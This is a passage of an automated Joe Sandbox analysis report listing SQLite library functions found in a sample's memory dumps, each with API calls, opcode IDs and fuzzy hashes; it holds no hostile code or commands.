                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3386002893-0
                                                                                                  • Opcode ID: 433a07e9234c972d4e0031012a2e75f961316140f3df874b4e8739b2bf66c14d
                                                                                                  • Instruction ID: 67b356d83cd9585e7e70b929bfaf64bb6b358c899ead43a9579cabc517c74ab7
                                                                                                  • Opcode Fuzzy Hash: 433a07e9234c972d4e0031012a2e75f961316140f3df874b4e8739b2bf66c14d
                                                                                                  • Instruction Fuzzy Hash: DD619C70A042958FDB10CFA8C5A069DBBF1AF8D318F25C66DEC95AB394D730D841CB91
                                                                                                  Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep_amsg_exit
                                                                                                  • String ID:
                                                                                                  • API String ID: 1015461914-0
                                                                                                  • Opcode ID: 49dd9235c73fdf9008b63f115083f4b7708775121eba95039c402c6c214052af
                                                                                                  • Instruction ID: 0ec9c130ea502a6cd13a585d470cf09fbcbbed9e135268e3d0a189fba7ffab22
                                                                                                  • Opcode Fuzzy Hash: 49dd9235c73fdf9008b63f115083f4b7708775121eba95039c402c6c214052af
                                                                                                  • Instruction Fuzzy Hash: 27418BB16587818BEB01AFE8C58430ABBF4EB85749F21C92DD4848F340D775C8918B82
                                                                                                  Function 61E262D6 Relevance: 10.6, APIs: 7, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2264764126-0
                                                                                                  • Opcode ID: d19a356a3953276cbeefdac50919968582a1f10989d8cb8510d6b6b4fab19bf8
                                                                                                  • Instruction ID: a7dcd195ea2f5d6ed875e22a8679152d8a4f94f80629a2bc9306fd3e507ff975
                                                                                                  • Opcode Fuzzy Hash: d19a356a3953276cbeefdac50919968582a1f10989d8cb8510d6b6b4fab19bf8
                                                                                                  • Instruction Fuzzy Hash: 0C317075A047968FDB009FA9C5A06ADBBF1EF8D354F24862DEC6497300D735E841CB91
                                                                                                  Function 61E2BBE9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2ABA3: sqlite3_log.SQLITE3(?,?,?,?,?,61E2AC56), ref: 61E2ABDE
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E2BC18
                                                                                                  • sqlite3_value_text16le.SQLITE3 ref: 61E2BC2C
                                                                                                  • sqlite3_value_text16le.SQLITE3 ref: 61E2BC5A
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2BC6E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID: bad parameter or other API misuse$out of memory
                                                                                                  • API String ID: 3568942437-948784999
                                                                                                  • Opcode ID: 78eb4bdf06fe48c2b392aa7c69192d653b29a984b4ad70ae40819f8a2c4eba0b
                                                                                                  • Instruction ID: ebacae9846b90ff835d8ea08a6e4043ff79c41a37182a71a36f7bbcf4e5ef98a
                                                                                                  • Opcode Fuzzy Hash: 78eb4bdf06fe48c2b392aa7c69192d653b29a984b4ad70ae40819f8a2c4eba0b
                                                                                                  • Instruction Fuzzy Hash: B5014C71E447568BDB00AFB885D5619BBE8AF84258F65C8BDEC88CF305EB30D8409791
                                                                                                  Function 61E3E20A Relevance: 9.4, APIs: 6, Instructions: 376stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • strcmp.MSVCRT ref: 61E3E625
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3E65D
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3E676
                                                                                                  • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3E6AD
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3E6C6
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E3E6D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2202632817-0
                                                                                                  • Opcode ID: 7212e8bf9bb4c94a67610ab749c98a746e4e4930c95d3a52946fbd386e0ace57
                                                                                                  • Instruction ID: 99ab64b62545cf4d2a2fcbe22115e901071292b51ab4f330a7eba75489a717a1
                                                                                                  • Opcode Fuzzy Hash: 7212e8bf9bb4c94a67610ab749c98a746e4e4930c95d3a52946fbd386e0ace57
                                                                                                  • Instruction Fuzzy Hash: 18F1F374A046598FDB04CFAAC48078EBBF1AF88318F24C529D859AB359E775EC46CB41
                                                                                                  Function 61E149E4 Relevance: 9.3, APIs: 6, Instructions: 262COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2585109301-0
                                                                                                  • Opcode ID: 7642a2181dea29bea9a267819ac7946627c42a1b70adba52bbf6d0754ed1a949
                                                                                                  • Instruction ID: 0ee8180db14efa06fd295bad07e7e787d323e875889d2c9ca7c465f1a61f7b21
                                                                                                  • Opcode Fuzzy Hash: 7642a2181dea29bea9a267819ac7946627c42a1b70adba52bbf6d0754ed1a949
                                                                                                  • Instruction Fuzzy Hash: 40B128B5A05205CFDB04CF68C48179AB7F1BF89318F29C46AD859AB349D734E856CFA0
                                                                                                  Function 61E90930 Relevance: 9.2, APIs: 6, Instructions: 220COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6db6626904b88d81a90e6ccca3a529979ed99af313a563b8a53c6b76778fb407
                                                                                                  • Instruction ID: 7572b3cf3f2c8450129e648722e635cdaa8a50528f6eac0b0000e9744e3760a7
                                                                                                  • Opcode Fuzzy Hash: 6db6626904b88d81a90e6ccca3a529979ed99af313a563b8a53c6b76778fb407
                                                                                                  • Instruction Fuzzy Hash: B1818871A056518FDB00DFA8C58065E7BFAFF85314FA4C929E849CB314E735E981CB92
                                                                                                  Function 61E253F6 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E25418
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E25426
                                                                                                  • sqlite3_value_bytes.SQLITE3 ref: 61E25433
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E25461
                                                                                                  • sqlite3_result_error.SQLITE3 ref: 61E2548B
                                                                                                  • sqlite3_result_int.SQLITE3 ref: 61E254CB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                                  • String ID:
                                                                                                  • API String ID: 4226599549-0
                                                                                                  • Opcode ID: 1891837d8b780cc7e00eff26345ff794a087c3d17c1562ad13da7815c257aaf0
                                                                                                  • Instruction ID: ec9588319cc7bdc93bdaa7479f117e430ac5edfe0f7ee05c80dfa186b46890a8
                                                                                                  • Opcode Fuzzy Hash: 1891837d8b780cc7e00eff26345ff794a087c3d17c1562ad13da7815c257aaf0
                                                                                                  • Instruction Fuzzy Hash: C9213870A057459BCB00DFA9DA9059DBBF1BF89329F20C92DE4A897394D734E841CF52
                                                                                                  Function 61E70A06 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: invalid rootpage
                                                                                                  • API String ID: 0-1762523506
                                                                                                  • Opcode ID: 6e8fda54cba8e3640e28ec312cd1a4d9fb1079c0453152167a5b1e69af9245c2
                                                                                                  • Instruction ID: 0b45de3ae3e11c8c7f1084f0324e6280b00f9193b3fd0eea3bc6ed1e8da83403
                                                                                                  • Opcode Fuzzy Hash: 6e8fda54cba8e3640e28ec312cd1a4d9fb1079c0453152167a5b1e69af9245c2
                                                                                                  • Instruction Fuzzy Hash: 8A417070A043459FEB20DF68C4907AABBF1AF8A318F24C56DE8A9DB351D731D941CB51
                                                                                                  Function 61E0E9A2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_strglob
                                                                                                  • String ID: $
                                                                                                  • API String ID: 476814121-227171996
                                                                                                  • Opcode ID: 327ca086ace3cb907df47ba5e7957a79c6c04124e5754500e9801dbcfe02bc1b
                                                                                                  • Instruction ID: 746dc4e5d7b4949defb47e86d2300d7a73148009f575b67e8c3df0aa89d4a177
                                                                                                  • Opcode Fuzzy Hash: 327ca086ace3cb907df47ba5e7957a79c6c04124e5754500e9801dbcfe02bc1b
                                                                                                  • Instruction Fuzzy Hash: D82138315087D28AD7118BBBC48071ABEF4BF4A31DF68D4BED4959A695E334D4A1C703
                                                                                                  Function 61E1A428 Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E1A480
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E1A516
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E1A447
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E1A6A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                                                                                  • String ID:
                                                                                                  • API String ID: 165182205-0
                                                                                                  • Opcode ID: 76c65b9fc32db27a3555d067055fc64798ed2678bfd6bb6712d1d685256d4c7d
                                                                                                  • Instruction ID: 94a85a0fd5006699915e2d888df1985c172c3090a8e2bd981fce105004b4e3ea
                                                                                                  • Opcode Fuzzy Hash: 76c65b9fc32db27a3555d067055fc64798ed2678bfd6bb6712d1d685256d4c7d
                                                                                                  • Instruction Fuzzy Hash: CEA1B374D48258CBCB04CFA9D484ADDFBF1BF88314F21852AD859AB358E774A949CF80
                                                                                                  Function 61E04F4A Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_strnicmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1961171630-0
                                                                                                  • Opcode ID: 4d4891d4671cf25910a243c0a64a963cdbfbfc2d71fd2cf911b7657f62eaf6dd
                                                                                                  • Instruction ID: 2a0453041a3a129b1c1c84525a9ad65f98c1ebcabe4bfb0d9d64c088fd7c20a8
                                                                                                  • Opcode Fuzzy Hash: 4d4891d4671cf25910a243c0a64a963cdbfbfc2d71fd2cf911b7657f62eaf6dd
                                                                                                  • Instruction Fuzzy Hash: 7251D5A544D64699E7118E9488813AD7FE6AF4234FF74D81BD4A447351C37BC0BBCA83
                                                                                                  Function 61E47BA4 Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E47E4F), ref: 61E47BCD
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E47E4F), ref: 61E47D5A
                                                                                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E47E4F), ref: 61E47D6C
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E47D83
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E47D8B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2921195555-0
                                                                                                  • Opcode ID: a3d260594fbcdeb6b59e233133c9c4895b1452456cccd11c96e31ee4d8e8917e
                                                                                                  • Instruction ID: 5736ab7dcc9ad6e3505bcaf49710fa9ea7d835b4af9efde1da68af5435d613fe
                                                                                                  • Opcode Fuzzy Hash: a3d260594fbcdeb6b59e233133c9c4895b1452456cccd11c96e31ee4d8e8917e
                                                                                                  • Instruction Fuzzy Hash: 8C515971A046428BDB04DFB9E88064AB7B1BF88318F25C96DDC589F305D738E866CBD5
                                                                                                  Function 61E47A92 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E13056: sqlite3_mutex_try.SQLITE3(?,?,?,61E130D6), ref: 61E12FF6
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E47AF6
                                                                                                  • sqlite3_mutex_free.SQLITE3 ref: 61E47B37
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E47B47
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E47B76
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E47B95
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
